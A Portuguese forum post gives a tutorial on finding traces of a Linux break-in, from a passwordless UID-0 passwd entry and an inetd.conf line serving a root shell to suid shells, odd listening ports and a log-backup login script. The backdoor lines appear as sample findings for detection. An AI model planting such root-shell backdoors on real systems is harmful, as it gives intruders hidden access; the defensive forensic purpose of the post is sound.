Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Achando Rastros de Uma Invasão

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Achando Rastros de Uma Invasão

    Nao se preocupe… sera muito facil encontrar rastros deixados por um lammer. primeiro porque lammers soh sabem fazer o que as receitas mostram, eles nao se preocupam em variar as tecnicas usadas. entao o que voce vai encontrar vai ser exatamente como esta nos txts. vamos ver…

    a backdoor mais lamah possivel voce pode encontrar no /etc/passwd.

    [root@localhost /etc]# grep “:0:0:” /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    lamah::0:0::/:/bin/sh

    ok… achamos nosso lammer… vamos ver c ele nao deixou outras backdoors aki…outras 2 backdoors comums sao suidshell e inetdaemon. para acha-las…

    [root@localhost /etc]# grep “sh” /etc/inetd.conf
    courier stream tcp nowait root /bin/sh sh -i

    uma variacao desta pode ser…

    [root@localhost /etc]# grep “\-i” /etc/inetd.conf
    swat stream tcp nowait root /usr/sbin/swat swat -i

    veja q o servico esta chamando o /usr/sbin/swat com os mesmos atributos do /bin/sh. vamos conferir para ver c swat == sh.

    [root@localhost /etc]# ls /bin/*sh
    /bin/ash /bin/bsh /bin/ksh /bin/tcsh
    /bin/bash /bin/csh /bin/sh /bin/zsh
    [root@localhost /etc]# cmp -c /bin/ash /usr/sbin/swat
    /bin/ash /usr/sbin/swat differ: char 25, line 1 is 20 ^p 220 m-^p
    [root@localhost /etc]# cmp -c /bin/bash /usr/sbin/swat
    [root@localhost /etc]#

    aha!!! soh pra quem nao sabe… cmp serve para comparar arquivos. comente a linha no inetd.conf e reinicie o inetd. para achar suidshells use:

    [root@localhost /]# find / -type f \( -perm -04000 -o -perm -02000 \) -user root

    vai ser exibido uma lista com todos os arquivos suids com owner root. cabe a voce saber o que eh programa do linux e o que foi criado pelos usuarios. uma dica… eh comum deixar as suidshells no mesmo diretorio onde eles deixam seus programas tais como xploits, sniffers e clearlogs. outra coisa… os diretorios usados sao na maioria das vezes os com permissao de all+rwx como /tmp e /var/tmp ou nos homedirs. tambem ha a posibilidade deles criarem os dir por issu voce pode procurar por estes com o comando:
    [root@localhost /etc]# find / -type d -perm 0777
    outro detalhe… esses lammers vao provavelmente rodar um portscan qualquer no seu host por issu voce pode acha-lo no log do syslogd (/var/logs/messages) caso ele nao tenha sido modificado. procure tambem nos ~/.history’s e nos wtmp, utmp e lastlog. lammers nunca dao muita importancia aos logs.
    2. hacker beginner.
    este vai se parecido com o lammer quanto ao fato dos diretorios… ele precisa de um lugar para por seus arquivos. ache o diretorio e voce acha o hacker. mas neste caso isto pode se tornar mais dificiu. caso o diretorio criado seja rwxr-xr-x como acha-lo??? procure por sources de programas e se nao encontra-los tente usar:
    [root@localhost nix]# strings a.out |grep /bin/sh
    /bin/sh
    issu serve para encontrar xploits ja que todos xploits tem esta string pois eh o que eles executam. procure-os nos homedirs e tmps tambem. arquivos ocultos sao muito usados. existem programas q fazem busca de sniffers por devices. rode-o e veja se nao encontra nada suspeito. rode tambem programas que procuram por logs apagados pelo zap. issu eh salvo caso o hacker tenha usado a minha versão do zap alterado. =)
    um hacker nao lamer no minimo iria colocar uma binder no seu sistema. para acha-lo use:
    [root@localhost /root]# lsof -i
    com isso sera listada todas as portas que estao sendo usadas. procure por algo suspeito como…
    a.out 3454 root 3u inet 84061 tcp *:31337 (listen)
    3. hacker eleet.
    esquece. se o hacker q ow nou vc for mesmo eleet torna-se praticamente impossivel de voce encontra-lo. mas existe certas prevencoes que vc pode fazer para detectar a presenca dele. uma das coisas eh fazer backup dos logs toda a vez que alguem se logar. crie uma particao somente para os logs.
    coloque no /etc/.bash_profile:
    #mude aki de acordo com a particao…
    mount /dev/hda2 /mnt
    d=`date –date “\`date |cut –bytes=5-10\`” +%j`
    cp -f /var/run/utmp /mnt/utmp.$d
    cp -f /var/log/lastlog /mnt/lastlog.$d
    cp -f /var/log/wtmp /mnt/wtmp.$d
    cp -f /var/log/messages /mnt/messages.$d
    cp -f ~/.bash_history /mnt/history.$user.$d
    umount /mnt
    pronto. toda a vez q vc logar os arquivos de logs serao copiados para a particao indicada. sera criado um arquivo diferente para cada dia, para que voce possa comparar os dados e encontrar alguma alteracao feita.
    COPIADO E EDITADO PARA UM MELHOR COMPREENSAO
X
Working...
X